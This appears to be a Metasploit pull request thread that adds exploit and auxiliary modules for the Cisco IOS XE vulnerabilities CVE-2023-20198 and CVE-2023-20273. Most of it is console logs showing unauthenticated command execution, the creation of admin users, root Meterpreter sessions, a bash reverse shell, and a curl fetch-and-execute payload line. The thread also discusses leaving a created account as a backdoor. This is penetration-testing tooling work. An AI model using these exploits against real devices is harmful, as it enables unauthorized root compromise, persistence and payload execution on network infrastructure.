Exploit & Auxiliary modules for CVE-2023-20198 and CVE-2023-20273 (Cisco IOS XE)

[sfewer-r7]

This pull request add two auxiliary modules for the recent Cisco IOS XE vulnerabilities that have been exploited in the wild.

The module auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 leverages CVE-2023-20198 to perform unauthenticated remote CLI command execution. Horizion3ai have a two part writeup with technical details on the vuln.

The module auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273 leverages both CVE-2023-20198 and CVE-2023-20273 to perform unauthenticated remote OS command execution. Leakix has a writeup with technical details on the second CVE. The reason this module is an aux module and not an exploit module is that, even though we get OS command execution, the OS seems to be hardened and running a Metasploit payload is non trivial (at least from some early testing on the device I have). I am investigating this further.

Example Usage (CVE-2023-20198)

msf6 > use auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set RHOST 192.168.86.57
RHOST => 192.168.86.57
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set CMD "exit\\nshow version"
CMD => exit\nshow version
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run
[*] Running module against 192.168.86.57


Cisco IOS XE Software, Version 16.12.03
Cisco IOS Software [Gibraltar], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 16.12.3, RELEASE SOFTWARE (fc5)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2020 by Cisco Systems, Inc.
Compiled Mon 09-Mar-20 21:50 by mcpre
...snip...

Example Usage (CVE-2023-20198 + CVE-2023-20273)

msf6 > use auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set RHOST 192.168.86.57
RHOST => 192.168.86.57
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set CMD "id"
CMD => id
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run
[*] Running module against 192.168.86.57

[*] uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0

[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run CMD="uname -a"
[*] Running module against 192.168.86.57

[*] Linux router 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux

[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > 

[jvoisin]

Suggested change

	<wsse:Password>*****</wsse:Password>
	<wsse:Password>#{Rex::Text.rand_text_alpha(8)}</wsse:Password>

[sfewer-r7]

The string ***** comes from how the Cisco Lua code expects to pass the password, and a comment in the Lua code notes its purpose:

-- Mask the password. It is for audit purposes only and it doesnt use it for authentication
FString  = string.gsub(FString,"#password","*****")

With this in mind I don't think we should change the string to a random alpha text. It makes more sense to leave it as the expected value.

[jvoisin]

Wow, amazing. In a bad way. But still, amazing.

[jvoisin]

I think it'd be easier for users to have a "PrivilegedExec" boolean instead of having to manually add a prefix, wouldn't it?

[sfewer-r7]

Yes, this is a good idea. I have implemented this via b286687

[sfewer-r7]

Converting this pull request to a draft as I have figured out how to run a payload, so can write an additional exploit module

[sfewer-r7]

I have added an RCE exploit module and tested it against IOS XE 17.3.2 and 16.12.3. I added support for both a Linux target (IOS XE is Linux based), but also Unix target, so a broader array of payloads are available (like python meterpreter or a bash shell).

Native Linux Meterpreter (via fetch payloads)

msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'sqVXixoV' with password 'ZiPbsXBu'
[*] Removing user 'sqVXixoV'
[*] Sending stage (3045380 bytes) to 192.168.86.58
[*] Meterpreter session 6 opened (192.168.86.42:4444 -> 192.168.86.58:64970) at 2023-11-06 17:01:06 +0000

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : router
OS           :  (Linux 4.19.106)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Unix bash reverse shell

msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'TVtEhbdd' with password 'NtRvujcZ'
[*] Removing user 'TVtEhbdd'
[*] Command shell session 9 opened (192.168.86.42:4444 -> 192.168.86.58:65036) at 2023-11-06 17:04:28 +0000

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux router 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.58 - Command shell session 9 closed.
msf6 exploit(linux/misc/cisco_ios_xe_rce) > 

[jvoisin]

Suggested change

	return false unless res&.code == 200
	true
	return res&.code == 200

[sfewer-r7]

good catch, thanks. resolved via 7024d4e (the trailing return can be removed also)

[jvoisin]

Suggested change

	if res =~ /(Cisco IOS XE Software, Version [\d\S]+\.[\d\S]+\.[\d\S]+)/
	if res =~ /(Cisco IOS XE Software, Version [^.]+\.[^.]+\.[\^.]+)/

[sfewer-r7]

Thanks Julien. Looking at the current expression, the \d is redundant so I think /(Cisco IOS XE Software, Version \S+\.\S+\.\S+)/ is probably the best expression. Using ^\. will also include whitespace chars which I was trying to avoid.

I have removed the redundant \d via 2a56c3f.

Testing (Cisco IOS XE Software, Version \S+\.\S+\.\S+):

Testing (Cisco IOS XE Software, Version [^\.]+\.[^\.]+\.[^\.]+):

[bwatters-r7]

msf6 > use exploit/linux/misc/cisco_ios_xe_rce 
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/misc/cisco_ios_xe_rce) > show options

Module options (exploit/linux/misc/cisco_ios_xe_rce):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   CISCO_CMD_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to execute a command.
   CISCO_VRF_NAME     global           yes       The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have
                                                 been tested to work.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/u
                                                 sing-metasploit.html
   RPORT              443              yes       The target port (TCP)
   SSL                true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                               no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      jWSTEaIE         no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/misc/cisco_ios_xe_rce) > set rhosts 10.5.135.193
rhosts => 10.5.135.193
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set verbose true
verbose => true
msf6 exploit(linux/misc/cisco_ios_xe_rce) > run

[*] Command to run on remote host: curl -so ./WlKtFuAjkfed http://10.5.135.201:8080/v3vZxR3P-stuKWjUe6pCeA; chmod +x ./WlKtFuAjkfed; ./WlKtFuAjkfed &
[*] Fetch Handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /v3vZxR3P-stuKWjUe6pCeA
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'IaAALVeV' with password 'FUaIMIRs'
[*] Sleeping for 2 seconds before attempting again
[*] Removing user 'IaAALVeV'
[*] Client 10.5.135.193 requested /v3vZxR3P-stuKWjUe6pCeA
[*] Sending payload to 10.5.135.193 (curl/7.57.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 10.5.135.193
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.135.193:64720) at 2023-11-07 11:53:00 -0600

meterpreter > sysinfo
Computer     : Router
OS           :  (Linux 4.19.64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > 

[bwatters-r7]

Just a quick question and I noticed that the docs might not have been updated after a change to the module.

[bwatters-r7]

Would it ever be worthwhile to leave the user as a backdoor?

[sfewer-r7]

Perhaps, I think as the aux module cisco_ios_xe_cli_exec_cve_2023_20198 would allow the creation of a new admin account via a CLI command, that is also an option.

[bwatters-r7]

msf6 exploit(linux/misc/cisco_ios_xe_rce) > use auxiliary/admin/http/cisco_ios_xe_
use auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198  use auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273
msf6 exploit(linux/misc/cisco_ios_xe_rce) > use auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > show options

Module options (auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD      show version     yes       The CLI command to execute.
   MODE     privileged       yes       The mode to execute the CLI command in, valid values are 'user', 'privileged', or 'global'.
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metas
                                       ploit.html
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set rhost 10.5.135.193
rhost => 10.5.135.193
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set verbose true
verbose => true
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run
[*] Running module against 10.5.135.193


Cisco IOS XE Software, Version 16.12.03
Cisco IOS Software [Gibraltar], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 16.12.3, RELEASE SOFTWARE (fc5)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2020 by Cisco Systems, Inc.
Compiled Mon 09-Mar-20 21:50 by mcpre
Cisco IOS-XE software, Copyright (c) 2005-2020 by cisco Systems, Inc.
All rights reserved.  Certain components of Cisco IOS-XE software are
licensed under the GNU General Public License ("GPL") Version 2.0.  The
software code licensed under GPL Version 2.0 is free software that comes
with ABSOLUTELY NO WARRANTY.  You can redistribute and/or modify such
GPL code under the terms of GPL Version 2.0.  For more details, see the
documentation or "License Notice" file accompanying the IOS-XE software,
or the applicable URL provided on the flyer accompanying the IOS-XE
software.
ROM: IOS-XE ROMMON
Router uptime is 2 hours, 43 minutes
Uptime for this control processor is 2 hours, 44 minutes
System returned to ROM by reload
System image file is "bootflash:packages.conf"
Last reload reason: reload
This product contains cryptographic features and is subject to United
States and local country laws governing import, export, transfer and
use. Delivery of Cisco cryptographic products does not imply
third-party authority to import, export, distribute or use encryption.
Importers, exporters, distributors and users are responsible for
compliance with U.S. and local country laws. By using this product you
agree to comply with applicable laws and regulations. If you are unable
to comply with U.S. and local laws, return this product immediately.
A summary of U.S. laws governing Cisco cryptographic products may be found at:
http://www.cisco.com/wwl/export/crypto/tool/stqrg.html
If you require further assistance please contact us by sending email to
[email protected].
License Level: ax
License Type: N/A(Smart License Enabled)
Next reload license Level: ax
Smart Licensing Status: UNREGISTERED/No Licenses in Use
cisco CSR1000V (VXE) processor (revision VXE) with 1113574K/3075K bytes of memory.
Processor board ID 90MA5Z72JQX
2 Gigabit Ethernet interfaces
32768K bytes of non-volatile configuration memory.
3012164K bytes of physical memory.
6188032K bytes of virtual hard disk at bootflash:.
0K bytes of WebUI ODM Files at webui:.
Configuration register is 0x2102

[*] Auxiliary module execution completed

msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > show options

Module options (auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273):

   Name                   Current Setting  Required  Description
   ----                   ---------------  --------  -----------
   CISCO_ADMIN_PASSWORD                    no        The password of an admin account. If not set, CVE-2023-20198 is leveraged to c
                                                     reate a new admin password.
   CISCO_ADMIN_USERNAME                    no        The username of an admin account. If not set, CVE-2023-20198 is leveraged to c
                                                     reate a new admin account.
   CMD                    id               yes       The OS command to execute.
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   REMOVE_OUTPUT_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to removing the commands
                                                     output file.
   RHOSTS                                  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
                                                     cs/using-metasploit.html
   RPORT                  443              yes       The target port (TCP)
   SSL                    true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                                   no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set rhosts 10.5.135.193
rhosts => 10.5.135.193
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set verbose true
verbose => true
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run
[*] Running module against 10.5.135.193

[*] Created privilege 15 user 'rfojGrqA' with password 'ixnXyFlw'
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0

[*] Removing output file '/var/www/fNrmuBOf'
[*] Removing user 'rfojGrqA'
[*] Auxiliary module execution completed

[bwatters-r7]

Release Notes

This PR adds three modules: auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 leverages CVE-2023-20198 to perform unauthenticated remote CLI command execution, module auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273 leverages both CVE-2023-20198 and CVE-2023-20273 to perform unauthenticated remote OS command execution, and exploit/linux/misc/cisco_ios_xe_rce uses the same two vulnerabilities to run an arbitrary payload on the target.